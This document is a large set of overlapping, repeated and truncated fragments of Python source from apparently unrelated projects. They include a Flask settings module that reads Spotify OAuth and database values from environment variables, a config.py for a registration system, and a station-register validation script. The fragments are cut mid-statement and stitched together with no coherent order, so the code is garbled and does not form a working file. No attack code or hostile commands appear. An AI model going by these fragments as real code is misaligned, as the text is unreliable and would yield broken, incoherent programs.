"SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING",
"environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\")",
"SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS = True",
"CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET",
"import load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path",
"= environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG =",
"environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL\") SQLALCHEMY_TRACK_MODIFICATIONS =",
"load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\")",
"or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI",
"\".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID =",
"if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL =",
"= True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET =",
"environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\")",
"FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\")",
"environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path,",
"path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\")",
"from dotenv import load_dotenv from os import environ, path from pathlib import Path",
"environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI =",
"Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY",
"TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else: CALLBACK_URL = environ.get(\"CALLBACK_URL\") SQLALCHEMY_DATABASE_URI =",
"environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL =",
"os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path",
"parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY =",
"= environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI",
"= Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True",
"from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent",
"SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG",
"= environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG",
"True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\")",
"import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE =",
"FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\")",
"CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET",
"from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path)",
"CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING:",
"= environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\") else:",
"load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY",
"environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or",
"= path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\")",
"Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE = True",
"= True CSRF_COOKIE_HTTPONLY = True SECRET_KEY = environ.get(\"SECRET_KEY\") SPOTIFY_OAUTH_CLIENT_ID = environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET =",
"= environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL",
"load_dotenv from os import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path =",
"= environ.get(\"SPOTIFY_OAUTH_CLIENT_ID\") SPOTIFY_OAUTH_CLIENT_SECRET = environ.get(\"SPOTIFY_OAUTH_CLIENT_SECRET\") CLOUD_STORAGE_BUCKET = environ.get(\"CLOUD_STORAGE_BUCKET\") FLASK_DEBUG = environ.get(\"FLASK_DEBUG\") TESTING =",
"TESTING = environ.get(\"TESTING\") if FLASK_DEBUG or TESTING: CALLBACK_URL = environ.get(\"CALLBACK_URL_DEV\") SQLALCHEMY_DATABASE_URI = environ.get(\"DATABASE_URL_DEV\")",
"pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path = path.join(parent_path, \".env\") load_dotenv(dotenv_path) CSRF_COOKIE_SECURE",
"import environ, path from pathlib import Path load_dotenv(verbose=True) parent_path = Path(__file__).parent dotenv_path ="
] |
[
"the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any",
"configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config):",
"class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app",
"config.py \"\"\" Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common",
"configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO = True",
"= False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production': 'ProductionConfig' }",
"TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug",
"# config.py \"\"\" Module containing the configurations for different environments \"\"\" class Config(object):",
"Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME =",
"Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False",
"\"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates",
"\"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\"",
"# Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING =",
"debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors",
"\"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments",
"True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy",
"to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while",
"configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING",
"all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG",
"True # activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy",
"app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True",
"environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG =",
"across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\"",
"DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO = True #",
"SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running class ProductionConfig(Config):",
"changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False",
"SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True",
"allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track",
"while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config",
"for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common",
"log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running",
"# allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to",
"errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes while running class",
"to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS",
"track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS =",
"configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations",
"# allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG",
"class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all environments SESSION_COOKIE_NAME",
"False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on",
"class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = {",
"SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False",
"<reponame>Anonymous78/Registration-System<filename>config.py # config.py \"\"\" Module containing the configurations for different environments \"\"\" class",
"= True # activates debug mode on app SQLALCHEMY_ECHO = True # allows",
"Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" #",
"= True # allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production",
"SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True #",
"running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config =",
"# activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to",
"SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows SQLAlchemy to track changes",
"different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across",
"common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development",
"\"\"\" Module containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\"",
"DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO",
"True # allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\"",
"mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS",
"DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production': 'ProductionConfig'",
"configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig', 'production':",
"= \"session\" TESTING = False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True #",
"= False class DevelopmentConfig(Config): \"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode",
"environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put any configurations common across all",
"allows SQLAlchemy to track changes while running class ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG =",
"containing the configurations for different environments \"\"\" class Config(object): \"\"\"Common configurations\"\"\" # Put",
"activates debug mode on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log",
"ProductionConfig(Config): \"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development':",
"any configurations common across all environments SESSION_COOKIE_NAME = \"session\" TESTING = False class",
"\"\"\"Production configurations\"\"\" DEBUG = False SQLALCHEMY_TRACK_MODIFICATIONS = False app_config = { 'development': 'DevelopmentConfig',",
"= True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS = True # allows",
"on app SQLALCHEMY_ECHO = True # allows SQLAlchemy to log errors SQLALCHEMY_TRACK_MODIFICATIONS =",
"\"\"\"Development configurations\"\"\" DEBUG = True # activates debug mode on app SQLALCHEMY_ECHO ="
] |
[
"SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or",
"'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' )",
"# app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master',",
"MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028",
"License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\"",
"(see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from",
"import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list(",
"'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator",
"# app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', )",
"# # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import',",
"fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog #",
") # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg',",
"16:37 @author: a002028 \"\"\" from stations.main import App if __name__ == '__main__': app",
"App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' )",
"(c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see",
"Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on",
"'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') #",
"'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import",
"= App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid",
"\"\"\" from stations.main import App if __name__ == '__main__': app = App() app.read_list(",
"a002028 \"\"\" from stations.main import App if __name__ == '__main__': app = App()",
"= 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import'",
"app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) #",
"2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__ == '__main__':",
") # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list(",
"fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg',",
"# writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path",
"Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01",
"'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid",
"app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', #",
"file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report",
"Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).",
") app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path)",
"writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path =",
"'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report = validator.validate(app.lists['master'])",
") app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log',",
"App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid =",
"# ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator =",
"app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog",
"from stations.main import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt',",
"http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App",
") # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') #",
"from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) #",
"<gh_stars>0 # Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License:",
"on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if __name__ ==",
"app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) #",
"# fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid,",
"# from stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # )",
"reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator import ValidatorLog # app.write_list(",
"or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import",
"# data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], #",
"and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created",
"= 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master')",
"fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from",
"@author: a002028 \"\"\" from stations.main import App if __name__ == '__main__': app =",
"Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\"",
"reader='shark_master', list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid =",
"list_name='master' ) # fid = 'C:\\\\station_exports\\\\validerade\\\\Stationsregistret_validering_gävle_validerad.xlsx' # fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx'",
"== '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid =",
"Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License",
"stations.validators.validator import ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # #",
"ValidatorLog # app.write_list( # writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( #",
"= 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #, 'master') # from stations.validators.validator",
"# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37",
"2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT License (see LICENSE.txt",
"= 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read') # # report =",
"fid = 'C:\\\\station_exports\\\\nkp\\\\Stationsregistret_validering.xlsx' fid = 'C:\\\\station_exports\\\\natvat\\\\StnReg03_Inmatningsmall.xlsx' app.read_list( fid, reader='stnreg', list_name='stnreg_import' ) app.validate_list('stnreg_import') #,",
"\"\"\" Created on 2020-10-01 16:37 @author: a002028 \"\"\" from stations.main import App if",
"# Copyright (c) 2020 SMHI, Swedish Meteorological and Hydrological Institute # License: MIT",
"__name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) # fid",
"# list_names=['master', 'stnreg_import'], # ) app.write_list( writer='stnreg', list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp'",
"writer='validation_log', # data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'],",
"import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master'",
"if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master', list_name='master' ) #",
"# ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # ) app.write_list(",
"License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit). \"\"\" Created on 2020-10-01 16:37 @author:",
"list_names='stnreg_import', ) # file_path = 'C:/Arbetsmapp/config/sharkweb_shapefiles/Havsomr_SVAR_2016_3c_CP1252.shp' # validator = PositionValidator(file_path=file_path) # print('shapes read')",
"data=ValidatorLog.log # ) # # app.write_list( # writer='shark_master', # list_names=['master', 'stnreg_import'], # )",
"stations.main import App if __name__ == '__main__': app = App() app.read_list( 'C:/Arbetsmapp/config/station.txt', reader='shark_master',",
